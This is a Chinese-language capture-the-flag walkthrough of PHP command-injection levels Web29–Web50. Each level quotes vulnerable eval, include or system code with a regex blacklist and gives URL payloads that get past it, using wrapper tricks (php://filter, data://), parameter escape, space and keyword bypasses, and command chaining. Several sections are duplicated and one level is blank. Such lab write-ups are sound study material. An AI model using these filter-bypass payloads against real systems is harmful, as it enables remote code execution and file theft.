Rce漏洞简介思维导图

Web29

代码审计：

if(!preg_match("/flag/i", $c)){
        eval($c);

传参没有flag（大小写都没有出现）

Payload：

?c=system("ls");

?c=system("tac *lag.php");

Web30

代码审计：过滤了flag|system|php

if(!preg_match("/flag|system|php/i", $c)){
        eval($c);
    }

payload：

?c=echo shell_exec("tac f*");

Web31

代码审计：参数逃逸绕过空格

if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){
        eval($c);
    }

payload：

?c=eval($_GET["p"]);&p=system("tac flag.php");

Web32

过滤内容

if(!preg_match(“/flag|system|php|cat|sort|shell|.| |'|`|echo|;|(/i”, $c))

参数逃逸+为协议绕过+%0a绕过空格

?c=include%0a$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php

Base64解码

Web32

过滤内容

if(!preg_match(“/flag|system|php|cat|sort|shell|.| |'|`|echo|;|(/i”, $c))

参数逃逸+为协议绕过+%0a绕过空格

?c=include%0a$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php

Base64解码

Web32

过滤内容

if(!preg_match(“/flag|system|php|cat|sort|shell|.| |'|`|echo|;|(/i”, $c))

参数逃逸+为协议绕过+%0a绕过空格

payload

?c=include%0a$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php

Base64解码

Web33

过滤语句

if(!preg_match(“/flag|system|php|cat|sort|shell|.| |'|`|echo|;|(|”/i", $c))

参数逃逸+为协议绕过+%0a绕过空格

?c=include%0a$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php

Base64解码

Web34

过滤内容

if(!preg_match(“/flag|system|php|cat|sort|shell|.| |'|`|echo|;|(|”/i", $c))

参数逃逸+为协议绕过+%0a绕过空格

?c=include%0a$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php

Base64解码

Web35

过滤了多一个>

!preg_match(“/flag|system|php|cat|sort|shell|.| |'|`|echo|;|(|:|”|<|=/i", $c)){

过滤内容

if(!preg_match(“/flag|system|php|cat|sort|shell|.| |'|`|echo|;|(|”/i", $c))

参数逃逸+为协议绕过+%0a绕过空格

?c=include%0a$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php

Base64解码

Web36

过滤语句（多了对数字的过滤）

if(!preg_match(“/flag|system|php|cat|sort|shell|.| |'|`|echo|;|(|:|”|<|=|/|[0-9]/i", $c))

payload参数逃逸+为协议绕过+%0a绕过空格,get传参变为a

?c=include%0a$_GET[a]?>&a=php://filter/convert.base64-encode/resource=flag.php

Web37

if(!preg_match("/flag/i", $c)){

        include($c);

        echo $flag;

利用include函数，绕过flag，用data为协议（data://text/plain）

Payload：

?c=data://text/plain,<?php system('tac fl*.*');?>

Web38

if(!preg_match("/flag|php|file/i", $c)){

        include($c);

        echo $flag;    

    }

利用include函数，绕过flag，用data为协议（data://text/plain）

Payload：

?c=data://text/plain,<?php system('tac fl*.*');?>

Web39

if(isset($_GET['c'])){

    $c = $_GET['c'];

    if(!preg_match("/flag/i", $c)){

        include($c.".php");

    }

利用include函数，绕过flag，用data为协议（data://text/plain）

Payload：

?c=data://text/plain,<?php system('tac fl*.*');?>

Web40

正则转换在线网站

RegexperRegular expression visualizer using railroad diagramshttps://regexper.com/

?c=print_r(get_defined_vars());可以输出所有的变量，如果此时通过post传递一个1=phpinfo();，那么打印的变量就会多一个

根据输出内容可以看到post传递的内容在数组的第二个中

通过next即可获取到数组中的第二个数组的指针。并打印出来。

然后利用array_pop()这个函数将数组中的值可以弹出

?c=eval(array_pop((next(get_defined_vars()))));

post中提交 1=system(‘tac flag.php’);

解释：通过post传递一个值，会存储在当前页面的变量中，get_defined_vars()获取当前页面所有变量，next取当前页面变量的第二个，也就是一个数组，array_pop是弹出数组的值，eval执行弹出的值。

Payload（无参rce）：

?c=eval(pos(next(get_defined_vars())));

post data:

1=system("tac fla*");

Web41

Web42

system($c." >/dev/null 2>&1");

c参数变量拼接了>/dev/null 2>&1

或运算符绕过，%0a换行绕过

Payload

url + ?c=tac flag.php ||

url +?c=tac flag.php ; ls

url + ?c=tac flag.php%0a

Web43

if(!preg_match("/;|cat|flag/i", $c)){

system($c." >/dev/null 2>&1");

nl，tac绕过cat

c参数变量拼接了>/dev/null 2>&1

或运算符绕过，%0a换行绕过

Payload

url + ?c=tac flag.php ||

url +?c=tac flag.php ; ls

url + ?c=tac flag.php%0a

Web44

if(!preg_match("/;|cat|flag/i", $c)){

    system($c." >/dev/null 2>&1");

Flag绕过方法拼接和*

nl，tac绕过cat

c参数变量拼接了>/dev/null 2>&1

或运算符绕过，%0a换行绕过

Payload

url + ?c=tac fl''ag.php||

url + ?c=tac fl*%0A

Web45

if(!preg_match("/\;|cat|flag| /i", $c)){

    system($c." >/dev/null 2>&1");

过滤了空格

空格绕过

<、<>、%20（space）、%09（tab）、$IFS$9、${IFS}、$IFS、{cat,/etc/passwd}、%0a（回车）

Payload

url + ?c=tac%09fl''ag.php||

Web46

if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*/i", $c)){

        system($c." >/dev/null 2>&1");

绕过空格

url + ?c=tac%09fl?g.php||

url + ?c=tac%09fl''ag.php||

Web47

if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`/i", $c)){

        system($c." >/dev/null 2>&1");

绕过空格

url + ?c=tac%09fl?g.php||

url + ?c=tac%09fl''ag.php||

Web48

if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`/i", $c)){

        system($c." >/dev/null 2>&1");

绕过空格

url + ?c=tac%09fl?g.php||

url + ?c=tac%09fl''ag.php||

Web49

if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`|\%/i", $c)){

        system($c." >/dev/null 2>&1");

绕过空格

url + ?c=tac%09fl?g.php||

url + ?c=tac%09fl''ag.php||

Web50

if(isset($_GET['c'])){

    $c=$_GET['c'];

    if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`|\%|\x09|\x26/i", $c)){

        system($c." >/dev/null 2>&1");

    }

}else{

    highlight_file(__FILE__);

}

Payload：

url + ?c=tac<>fl''ag.php||